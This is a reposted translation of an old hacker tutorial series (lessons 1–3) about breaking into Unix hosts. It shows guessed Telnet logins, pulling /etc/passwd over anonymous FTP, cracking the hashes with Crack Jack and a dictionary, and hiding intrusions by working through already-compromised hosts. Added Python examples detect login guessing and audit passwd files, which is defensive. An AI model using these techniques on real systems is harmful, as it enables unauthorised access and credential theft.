CoolFire lecture series lecture 1

Keywords: ftp Unix Linux network

Author: CoolFire [coolfires@hotmail.com] (2001-10-12 15:00:00)
CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@hotmail.com

Lin Zhenglong, a well-known hacker from Taiwan, is regarded as the leading figure among Chinese hackers; he received the COG Information Security Lifetime Achievement Award in 2011. (Source: Lin Zhenglong, Baidu Encyclopedia)

Note: this series collects and tidies up CoolFire's eight entry-level hacker articles. The copies found on the Internet are either incomplete or so badly laid out that they are painful to read, so this series reorganises them for a better reading experience.

This is not a teaching document. It only shows how systems get broken into so that you can protect your own system. If you read this document through, you will know how hackers get into your computer. I'm CoolFire. The purpose of this article is to make you understand the importance of computer security, not to teach people to crack passwords. If anyone maliciously breaks into someone else's computer or network because of this file, I take no responsibility!!

1. What is Hacking?

Breaking into computers! What more is there to explain? Most books, novels and documents about hackers describe them as people obsessed with computers, destroyers... Alas! Just a pile of strange explanations. Maybe it's better not to be a hacker. I no...

2. Why do you want Hack?

We just want to understand more about the system's technology: get into it, understand how it works, test its security, then learn to use it, read the system's own operating instructions and learn its various operations!! Revolution for security!

3. The hacker's code

  1. Do not maliciously damage any system; it will only bring you trouble. Maliciously damaging other people's software leads to legal punishment; if you only use the computer, it is merely unauthorised use!! Note: do not damage other people's software or data!!
  2. Do not modify any system files. If you entered the system and changed something, put it back the way it was once you have achieved your purpose.
  3. Don't casually tell friends you don't trust which platform you intend to hack.
  4. Don't talk about anything related to your hacking on a BBS.
  5. Don't use your real name when you post.
  6. Don't leave your computer while you are intruding.
  7. Do not intrude into or damage the hosts of government agencies.
  8. Don't talk about anything related to your hacking on the phone.
  9. Keep your notes in a safe place.
  10. If you want to be a hacker, you have to really hack. Read all the files about system security or system vulnerabilities!
  11. Do not delete or modify the accounts on a computer you have broken into.
  12. Do not modify system files, except where a modification is needed to hide the intrusion; even then you must keep the original system secure and not leave a door open just because you control the system!!
  13. Do not share your cracked account with your friends.

4. The way to go about it

  1. Get into the host
  2. Get /etc/passwd
  3. Get a system account
  4. Get the highest privileges

How 1.

There are several ways to get into a host: through Telnet (port 23), SendMail (port 25), FTP or WWW (port 80). Although a host has only one address, it can provide several services at the same time, so if you just want to "get into" the host, these ports are good directions. Of course there are many more ports, but what can you do with the DayTime port??? I don't know, do you?!

The following demonstration was not as easy as it reads; it is only to show you how to get in. Of course there were plenty of problems, such as mistyped commands... but those didn't make it into the class: for the sake of face, the ugly parts had to be deleted.

Demonstration of how to get into a host: (by CoolFire)

(First, connect to a Telnet host where you already have an account. Of course it's better if it is a "fake" host, that is, a host that has already been cracked, and then use it to crack other hosts, so that nobody can trace back to where you are.)

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0

(I'm using ms.hinet.net... of course that's fake, it has been changed!! There's no such host!! Don't be afraid! Don't be afraid! The host names below are all fake. Please remember that!!)

Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(Um... we're in! Let's attack! This time the target is... )

ms.hinet.net> telnet www.fuckyou.hinet.net    (Give Telnet a try....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(Never mind, try again!!)

cool login: hinet
Password:
Login incorrect
cool login:

(I didn't guess right. I'm using the guessing method here. It seems my luck is bad today.)

telnet> close
Connection closed.

(Try another port!!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>
Invalid request "" (unknown method)
<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(Wow!! I didn't even get asked for a password. It really is... Try again!! Be persistent!!)
(Try the FTP port)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user!   This is an experimental FTP server.   If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(Wow! You can get in with anonymous!! Just type aaa@ in the password field! Don't leave footprints!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(Uh huh... Great! We're in! The next goal is... )

ftp> cd etc
250 CWD command successful.
ftp> get passwd          (Grab it!!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(Oh... is it that easy...)

ftp> !cat passwd       (Have a look !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(Wow... it's shadowed... a bad start...)

ftp> bye
221 Goodbye.

(Don't give in... as the old saying goes, we must have perseverance.)
(FTP doesn't work. Try Telnet again!!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(Guessed wrong again!!)

cool login: fuckyou
Password:
Last login: Mon Dec   2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$  

(Wahaha!! Which stupid root uses the system name as the username and the system name as the password... Finally... not a wasted effort...)

cool:~$ system
bash: system: command not found

(Um... this user doesn't seem to have much permission...)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/       cdrom/        lib/          mnt/          tmp/          www/
README        dev/          linux*        proc/         usr/
bin/          etc/          local/        root/         var/
boot/         home/         lost+found/   sbin/         
cool:/$ cd etc
telnet> quit

(I really want to sleep!! No more playing!! Next class...)

Connection closed.
ms.hinet.net> exit

(Gone!! See you next class!! That's it for today! The teacher has to go to work first!!)
(Some students say: cheat! Nothing has been cracked yet!! Nonsense! Haven't we got in??? Look at what this class was about??? -> getting into the host!! Hmm...)
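The guessing in the session above is what a defender sees as a run of failed logins from one source, followed by a success once the username-equals-password account is hit. The following is an added example, not part of CoolFire's article: it runs a simple detection over constructed log lines written in the style of login(1)'s syslog messages ("FAILED LOGIN ... FROM ... FOR ..." and "LOGIN ON ... BY ... FROM ..."), reusing host names from the lesson. The exact wording your login binary emits is an assumption here, so adjust the two patterns to your own logs.

```python
# Added example (not part of CoolFire's article): spot the password guessing
# shown in the session above from the defender's side. The log lines are
# constructed for this example in the style of login(1)'s syslog messages,
# reusing host names from the lesson; the exact wording your login binary
# emits may differ, so adjust FAILED_RE and SUCCESS_RE to your own logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_AUTH_LOG = """\
Dec  2 09:18:51 cool login[211]: FAILED LOGIN 1 FROM ms.hinet.net FOR root, Authentication failure
Dec  2 09:19:02 cool login[211]: FAILED LOGIN 2 FROM ms.hinet.net FOR hinet, Authentication failure
Dec  2 09:19:30 cool login[214]: FAILED LOGIN 1 FROM ms.hinet.net FOR cool, Authentication failure
Dec  2 09:20:07 cool login[214]: LOGIN ON ttyp1 BY cool FROM ms.hinet.net
Dec  2 11:02:44 cool login[300]: LOGIN ON ttyp2 BY john FROM 205.11.122.12
"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"
FAILED_RE = re.compile(TS + r" \S+ login\[\d+\]: FAILED LOGIN \d+ FROM (?P<src>\S+) FOR (?P<user>[^,]+),")
SUCCESS_RE = re.compile(TS + r" \S+ login\[\d+\]: LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<src>\S+)")

LOG_YEAR = 1996  # syslog timestamps carry no year; the lesson dates from 1996


def parse_ts(text: str) -> datetime:
    """Turn a syslog timestamp like 'Dec  2 09:18:51' into a datetime."""
    return datetime.strptime(f"{LOG_YEAR} {text}", "%Y %b %d %H:%M:%S")


def detect_guessing(log_text: str, threshold: int = 3,
                    window: timedelta = timedelta(minutes=10)) -> list:
    """Return alerts for (a) `threshold` failed logins from one source host
    within `window` and (b) a successful login from a source that failed
    recently, which is what a guessed password looks like in the log."""
    failures = defaultdict(list)   # source host -> [(time, username tried)]
    alerts = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts, src = parse_ts(m["ts"]), m["src"]
            failures[src].append((ts, m["user"].strip()))
            recent = [u for t, u in failures[src] if ts - t <= window]
            if len(recent) == threshold:   # fire once, when the threshold is reached
                alerts.append(("guessing", src, sorted(set(recent))))
            continue
        m = SUCCESS_RE.match(line)
        if m:
            ts, src = parse_ts(m["ts"]), m["src"]
            if any(ts - t <= window for t, _ in failures[src]):
                alerts.append(("success-after-failures", src, m["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_AUTH_LOG):
        print(alert)
```

On the constructed sample this reports one "guessing" alert for ms.hinet.net (three different usernames tried within a minute) and one "success-after-failures" alert for the account "cool", while john's unrelated login from another address produces nothing. The success-after-failures rule is the more useful of the two: a lockout threshold alone would have let the fourth attempt through.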

How 2.

In the last lesson I grabbed a "messy" /etc/passwd. Do you think I'm really that stupid? What good thing could a guest grab? So this lesson continues the last attack. In the last lesson we "guessed" a username and password that is not a guest account. Let's use it to get into the host today!!

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(Um... we're in! Let's attack! This time the target is... Ah... )

ms.hinet.net> telnet cool.fuckyou.hinet.net    (Give Telnet a try.... Yesterday's address, take notes!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password:              (Enter fuckyou again)
Last login: Mon Dec   1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS          ftpusers            localtime           resolv.conf
HOSTNAME            gateways            magic               rpc
NETWORKING          group               mail.rc             securetty
NNTP_INEWS_DOMAIN   host.conf           motd                sendmail.cf
X11@                hosts               messages/               sendmail.st
XF86Config          hosts.allow         mtab                services
at.deny             hosts.deny          mtools              shells
bootptab            hosts.equiv         named.boot          shutdownp
csh.cshrc           hosts.lpd           networks            snoopy/
csh.login           httpd.conf          nntpserver          slip.hosts
exports             inetd.conf          passwd              snooptab
fastboot            inittab             passwd.OLD          syslog.conf
fdprm               issue               passwd.old          syslog.pid
fstab               ld.so.cache         printcap            ttys
ftpaccess           ld.so.conf          profile             utmp@

(Looking for the target... it's too messy! I'm too lazy to look through it. Try again...)

cool:/etc$ ls pa*
passwd       passwd.OLD   passwd.old

(As expected)

cool:/etc$ more passwd

(See whether it's shadowed...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(Sure enough! There's no defence at all!!)

cool:/etc$ exit
logout

(Gone!... Let's play with FTP!)

Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(Look! Oh! It can't be fake!!..)

ftp> bye
221 Goodbye.
ms.hinet.net> exit

(Class dismissed!! Class is over!!... Oh, slow down. There's something else to explain...)
Shadowing passwd means putting the passwords into a shadow file. The passwd you saw in the first lesson is not the real passwd:
root::0:0:root:/root:/bin/bash
Because there is nothing in the password field, taking it is useless!! But what did you get in this lesson? Something like this. What needs explaining is what it means???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

It is divided into fields by ":". The fields correspond as follows:

User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh
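The seven-field layout just described is exactly what a defender should check on their own hosts, and the two passwd listings in these lessons show the two things to look for: an empty password field (the root line from lesson 1) and a real hash sitting in the world-readable passwd file instead of the shadow file (john's line from lesson 2). The following is an added example, not code from CoolFire's article: a small parser for the format plus an audit over a sample constructed from the entries shown above, with one made-up "admin" line added to show the duplicate-UID-0 check.

```python
# Added example (not part of CoolFire's article): parse /etc/passwd-style data
# and flag the weaknesses the lessons above revolve around. The sample below is
# constructed from entries shown in the lessons plus one made-up "admin" line.
from dataclasses import dataclass

SAMPLE_PASSWD = """\
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
ftp:*:404:1::/home/ftp:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/sh
admin:x:0:0:constructed second root:/root:/bin/bash
"""

# Values that mean "no usable password here" rather than a hash:
# "x" = look in /etc/shadow, the others = account locked.
LOCKED_MARKERS = ("x", "*", "!", "!!", "*NP*", "!*")


@dataclass
class PasswdEntry:
    name: str
    password: str  # hash, a locked marker, "x" (in shadow) or "" (no password)
    uid: int
    gid: int
    gecos: str     # the "Real Name" field above
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Split passwd lines on ':' into the seven fields listed in the lesson."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(entries: list) -> list:
    """Return (account, problem) pairs for entries a defender should fix."""
    findings = []
    for e in entries:
        if e.password == "":
            # Empty field: login without any password (the root line from lesson 1).
            findings.append((e.name, "empty password field: no password required"))
        elif e.password not in LOCKED_MARKERS and not e.password.startswith("!"):
            # A real hash in the world-readable passwd file (john's line from
            # lesson 2); it belongs in /etc/shadow, readable only by root.
            findings.append((e.name, "password hash exposed in passwd; move it to shadow"))
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "additional UID 0 account"))
    return findings


def audit_text(text: str) -> list:
    """Convenience wrapper: parse and audit in one call."""
    return audit_passwd(parse_passwd(text))


if __name__ == "__main__":
    for account, problem in audit_text(SAMPLE_PASSWD):
        print(f"{account}: {problem}")
```

Run against a real file with `audit_text(open("/etc/passwd").read())`; on a correctly shadowed system every non-locked account has "x" in the second field and the audit returns nothing except any extra UID 0 accounts.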

Come on! Come on! Keep the passwd you worked so hard to get. In the third lesson we'll talk about how to use Crack Jack to decode passwd... Ha ha... zzZZzZzz...

How 3.

Crack Jack V1.4 instructions in Chinese (by CoolFire, 12-1-1996)

Um... It's time for lesson 3!! Tired students, go and get a drink of water first! In this lesson let's talk about Crack Jack! This is a good tool for decoding /etc/passwd. Don't tell me you're used to using Brute. Compare the speed of Brute and Crack Jack and you will immediately throw yourself into the arms of Crack Jack 1.4, but first make sure you are using Crack Jack 1.4, which you can get from CoolFire's hacker & mailer page! That is the really useful version. Speed... yes... nothing else can match it! But we still have to talk about its shortcomings: it only runs under DOS and OS/2. If you run it in DOS mode under Windoz 95, it won't even pay attention to you!

OK! Now let's get to the point! /etc/passwd! Let's start! The things you need before using Crack Jack 1.4 are: [1] Crack Jack 1.4 $%^&@@ [2] the /etc/passwd file, which you can find in the /etc/ directory of a Unix system [3] a dictionary file. Oh, ClayMore comes with a dictionary of more than 1000 words, but it's much smaller than my dictionary, which is also included in LetMeIn! 1.0. According to James, when 2.0 is released there will be better dictionary files included. Look forward to it... Before using Crack Jack 1.4, make sure the machine you are using has a 386 or better CPU! Then you'd better have enough memory!!

To start Jack, just type jack. It asks for "PW Name": enter your passwd file name; then "dictionary name": enter your dictionary file name, and Jack starts searching! When it finds something it tells you, and the passwords it finds are written to JACK.POT!! but in a strange format! If it finds a password with root permission, Jack tells you "this is a jackass"... um... swearing!! Because running Jack takes a long time, if you want to stop halfway just press Ctrl-C; don't think you've lost all your effort! Jack has a RESTORE function: when it is interrupted, the state is automatically saved as RESTORE. Next time you want to continue the search, just enter Jack -Restore:RESTORE!! Of course you can rename your RESTORE file; Jack will still find it. For example, if you rename restore to restore.HNT, just enter Jack -Restore:RESTORE.HNT and Jack will automatically resume from the last string it was looking at and keep searching for you.

Where to find a dictionary file: I won't give you one! Some other programs, such as Brute Force, come with one attached, or you can look around other hacker underground sites to see if there is one. You can also make one yourself, or use an English-Chinese dictionary program to cover the dictionary part; it may have some data fields and a basis for writing programs...

[No example in this lesson] Success story: found the root password of an Internet cafe! Jack nailed it!!! Time taken: about 20 minutes... but some can't be found in a day or two... Woo... Hackers! Come on!!
(To be continued)


Posted by random1 on Tue, 11 Feb 2020 22:57:36 -0800